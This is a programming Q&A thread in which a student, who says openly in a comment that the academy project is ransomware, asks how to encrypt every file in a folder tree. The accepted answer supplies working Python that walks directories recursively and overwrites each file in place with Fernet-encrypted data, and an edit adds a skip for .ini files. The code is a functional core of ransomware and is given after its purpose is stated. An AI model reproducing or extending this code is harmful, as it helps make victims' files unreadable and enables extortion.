# How can I convert a PureWindowsPath to a Iterable?

Tags: python, python-3.x

I'm working on an academy project to encrypt some files I have managed to encrypt all files from one folder but when there is a folder into that folder i get errors so i decide to first list all files and sub-directories of the folder:

```
ROOT = r"C:\Users\Practiques\Desktop\archivos"

    for path, subdirs, files in os.walk(ROOT):
        for name in files:
            pure_path = PurePath(path, name)
            print (pure_path)
```

With this code I get the paths in that form: C:\Users\XXX\Desktop\archivos\external-content.duckduckgo.com.jpg
C:\Users\XXX\Desktop\archivos\hola.txt

and then when i try to pass to the function 'encrypt', i get this error:

```
TypeError: 'PureWindowsPath' object is not iterable
```

The format I need to pass to the function is this: ['C:\Users\XXX\Desktop\archivos\external-content.duckduckgo.com.jpg', 'C:\Users\XXX\Desktop\archivos\hola.txt', etc.]

I think one possible solution is to make a list when i obtain all recursive path and their files, but i don't know how to do that.

The function encrypt:

```
def encrypt(items, key):
    f = Fernet(key)
    for item in items:
        with open(item, 'rb') as file:
            file_data = file.read()
        encrypted_data = f.encrypt(file_data)
        with open(item, 'wb') as file:
            file.write(encrypted_data)
```

How i call it:

```
for path, subdirs, files in os.walk(ROOT):
    for name in files:
        pure_path = PurePath(path, name)
        print (pure_path)
        encrypt(pure_path, key)
```

Comment: Since when did an academy hand out a ransomware virus as a project?

Comment: @MarkRansom we need to de a project related with the cybersecurity and i dicided to program a Ransomware.

Answer (score 0, accepted):

You need to use recursion to encrypt the sub-folders' contents:

```
import os

def recursive_search(path: str) -> "list[str]":
    """get all files from an absolute path

    :param path: absolute path of the directory to search
    :type path: str
    :return: a list of all files
    :rtype: list[str]
    """
    found_files = []
    if not os.path.isdir(path):
        raise RuntimeError(f"'{path}' is not a directory")
    for item in os.listdir(path):
        full_path = os.path.join(path, item)
        if os.path.isfile(full_path):
            found_files.append(full_path)
        elif os.path.isdir(full_path):
            found_files.extend(recursive_search(full_path))
    return found_files

directory = "YOUR ROOT/TOP-LEVEL DIRECTORY HERE"
print(recursive_search(directory))
```

Then, you would do:

```
f = Fernet(key)
for item in recursive_search(directory):
    with open(item, 'rb') as file:
        file_data = file.read()
    encrypted_data = f.encrypt(file_data)
    with open(item, 'wb') as file:
        file.write(encrypted_data)
```

Edit 1: in regard to skipping over certain file extensions:

```
import os

def recursive_search(path: str) -> "list[str]":
    """get all files from an absolute path

    :param path: absolute path of the directory to search
    :type path: str
    :return: a list of all files
    :rtype: list[str]
    """
    found_files = []
    if not os.path.isdir(path):
        raise RuntimeError(f"'{path}' is not a directory")
    for item in os.listdir(path):
        full_path = os.path.join(path, item)
        dot_extension = os.path.splitext(full_path)[1] # ex.: '.txt'
        if os.path.isfile(full_path):
            if dot_extension == ".ini":
                continue # this tells python to skip to break the for-loop run on the current item in an iterable and go to the next one
            found_files.append(full_path)
        elif os.path.isdir(full_path):
            found_files.extend(recursive_search(full_path))
    return found_files

directory = "/Users/nicholasbarrow/GitHub/com.nicholasrbarrow.cpp"
print(recursive_search(directory))

f = Fernet(key)
for item in recursive_search(directory):
    with open(item, 'rb') as file:
        file_data = file.read()
    encrypted_data = f.encrypt(file_data)
    with open(item, 'wb') as file:
        file.write(encrypted_data)
```

Comment: Hi again, do you know how I can ignore a file from the directory, I use your code for the recursive search, but I want to ignore the files "desktop.ini", how I can do the recursive search but ignore a determinated file? thanks.

Comment: Hi @noealpo , I edited the answer to accomplish this; see 'Edit 1'; basically, you get the extension of the file using ```os.path.splitext("file.ext")[1]``` which returns ```".ext"``` and then define custom rules and check if it needs to be ignored (using ```continue``` tells python to skip to the next item in an iterable and do nothing else in the current one as soon as ```continue``` is called)